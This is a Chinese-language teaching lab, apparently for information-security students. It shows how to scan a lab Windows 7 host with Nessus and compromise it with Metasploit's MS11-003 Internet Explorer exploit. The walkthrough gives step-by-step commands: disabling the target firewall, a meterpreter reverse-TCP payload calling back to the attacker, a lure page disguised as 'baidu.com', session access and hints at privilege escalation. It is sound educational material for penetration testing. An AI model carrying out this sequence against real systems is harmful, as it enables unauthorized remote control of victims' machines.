1. 程式人生 > 其它 >筆記整理:Metasploit攻擊win7例項

筆記整理:Metasploit攻擊win7例項

實驗簡介

實驗所屬系列: 安全工具使用

實驗物件:本科/專科資訊保安專業

相關課程及專業: linux基礎、網路安全

實驗類別: 實踐實驗類

預備知識

Nessus基本介紹

Nessus是一個功能強大而又易於使用的網路和主機漏洞評估工具,分為免費的家庭版和付費的企業版。Nessus6.0以後採取Browser/Server模式,Server端負責進行安全檢查、具體的掃描任務,客戶端用來配置管理伺服器端。服務端採用plug-in的體系,允許使用者加入執行特定功能的外掛,這外掛可以進行更快速和更復雜的安全檢查。Nessus自帶大量安全檢查外掛能夠滿足一般使用者的安全評估任務需要,如果有特殊需要也可以將自己開發的安全檢查外掛整合到Nessus中。

和其他安全掃描工具相比,Nessus主要優勢在於免費、擴充套件性強,容易使用以及能夠對目標系統進行全面的漏洞掃描。

預設狀態下, Nessus安裝成功後會開機自啟動,使用者使用安裝時配置的賬號登陸其管理介面,新增掃描任務,根據相關需要對掃描任務的相關屬性進行詳細的配置。等掃描完成以後,會生成一份詳細的報告,報告裡會將掃描結果按照危險係數高低分成高危漏洞、中危漏洞、低危漏洞三類,我們一般重點關注高危漏洞,中危漏洞利用條件會比較苛刻,低危漏洞基本沒有利用的可能。檢視高危漏洞詳情,根據漏洞簡介資訊使用google搜尋是否存在已知的Exp和攻擊方法可以提高安全測試效率。

實驗目的

通過該實驗熟悉Nessus漏洞掃描工具的安裝和主機漏洞掃描的方法,學會利用Nessus掃描結果篩選合適的Metasploit攻擊模組進行安全測試、攻擊。

實驗環境

圖1 實驗拓撲圖

漏洞主機:win7,IP地址:10.1.1.129

攻擊主機:Kali linux,IP地址:10.1.1.128

實驗步驟一

初步瞭解實驗環境及Nessus安裝(實驗步驟一操作已全部完成,實驗環境內的操作從實驗步驟二開始)

1.檢視win7漏洞主機的登入使用者及網路配置資訊,從下圖2可以看出漏洞主機IP為10.1.1.129。使用命令如下:

ipconfig檢視網路配置資訊

圖2 查詢漏洞主機資訊

2.為了更好的演示攻擊win7系統例項需要關閉win7系統的防火牆,win+R輸入cmd,執行“netsh firewall set opmode mode=disable”命令

圖3 關閉目標主機防火牆

3.檢視攻擊者主機登陸使用者及網路配置資訊,從下圖3可以看出攻擊主機登陸使用者為root ,IP為10.1.1.128

whoami檢視當前登陸使用者

ifconfig檢視網路配置資訊

圖4 查詢攻擊主機資訊

4.在Nessus官網下載頁面選擇適合Kali linux的安裝程式。經實驗證明多個版本的都可以在kali linux上安裝成功,這裡選擇“Debian 6,7,8,9/Kali Linux 1,2017.3 AMD64”版本程式。下載之後,拷貝到Kali linux主機上,執行下列命令進行安裝:

dpkg -i Nessus-8.9.1-debian6_amd64.deb 安裝Debian安裝包

圖5 安裝Nessus

5.在官網(http://www.tenable.com/products/nessus-essentials)進行註冊獲取免費版啟用驗證碼,填寫如下表單

圖6 註冊Nessus賬號

6.啟動Nessus服務

/etc/init.d/nessusd start

圖7 啟動Nessus

7.在瀏覽器中輸入https://127.0.0.1:8834/,會提示證書不可信,可以按照提示新增對https://127.0.0.1:8834/的信任。設定Nessus的管理賬號資訊,並輸入之前獲得的驗證碼啟用Nessus.

圖8 設定Nessus賬號

圖9 啟用Nessus

8.啟用成功後,Nessus會從官網下載相關的檢測元件,這個過程耗時長短由主機網路環境決定。下載完成後會提示初始化Nessus環境,等初始化完成,Nessus就可以正常使用了。

實驗步驟二

利用Nessus掃描目標主機

執行命令 /etc/init.d/nessusd start 啟動Nessus服務

訪問Nessus控制端https://127.0.0.1:8834/。輸入安裝時設定的賬號資訊(密碼在桌面nessus資料夾內)。

圖10 登陸Nessus

新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

圖11 新建Nessus掃描

配置掃描資訊,主要設定掃描名稱、描述和掃描目標三個資訊即可,其他配置選擇預設,配置完成點選Save。選擇對整個10.1.1.0/24網段進行掃描,如下圖所示。

圖12 配置Nessus掃描

掃描結束後,Nessus會很直觀的顯示出目標網段的安全情況。下圖顯示了整個網段的安全資訊。Nessus將安全問題歸類為Info/Low/Medium/High/Critical五個等級,其中Critical等級的問題是最危險的,Info級別的問題通常是無關痛癢的資訊顯示問題。

圖13 Nessus掃描網段結果

重點關注10.1.1.129主機,即win7靶機,Nessus掃描出該主機存在四個最高危漏洞、2個高危漏洞及其它漏洞問題。

圖14 10.1.1.129主機漏洞概況

選中高危漏洞,Nessus給出了該漏洞的介紹、風險資訊、解決方案等詳細資訊。Risk information對於攻擊者來說非常有用,可以根據Risk information去Google搜尋是否存在已知的漏洞利用Exp。

圖15 MS11-030漏洞詳情

實驗步驟三

利用MS11_003 IE漏洞攻擊win7主機

步驟二中掃描得到win7主機系統存在MS11_030解析漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來演示如何通過誘騙攻擊者點選我們精心構造的含有攻擊程式碼的網頁來實現系統入侵。

1.在kali中執行“msfconsole”,啟動metasploit

2.執行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP

3.執行命令:show options,檢視配置選項

4.設定生成的惡意網頁的URI為baidu.com

執行命令:set URIPATH baidu.com

5.為防止伺服器埠衝突,設定伺服器埠為8060,避開常用埠8080

執行命令:set SRVPORT 8060

6.設定攻擊負載

執行命令:set PAYLOAD windows/meterpreter/reverse_tcp

7.檢視配置選項

執行命令: show options

8.設定LHOST以繫結本地IP

set LHOST 10.1.1.128

9.為避免衝突設定LPORT

執行命令:set LPORT 8866

10.執行命令“exploit”開始進行攻擊,生成惡意網頁和做好其他準備,只等受害者訪問我們構造的惡意網頁

11.在 Win7靶機開啟IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點選網頁,靶機IE如下圖所示,攻擊者Metasploit顯示如下圖所示資訊表明攻擊成功。

12.驗證攻擊是否成功。列出當前成功建立的回話,任意進入一個回話,檢視攻擊者的身份。可以嘗試使用getsystem進行進一步的提權,如果提權失敗則可以採取上傳提權exe程式進行提權的方案獲得最高許可權。

sessions列出所有會話

sessions -i 1進入1號會話

getuid檢視當前使用者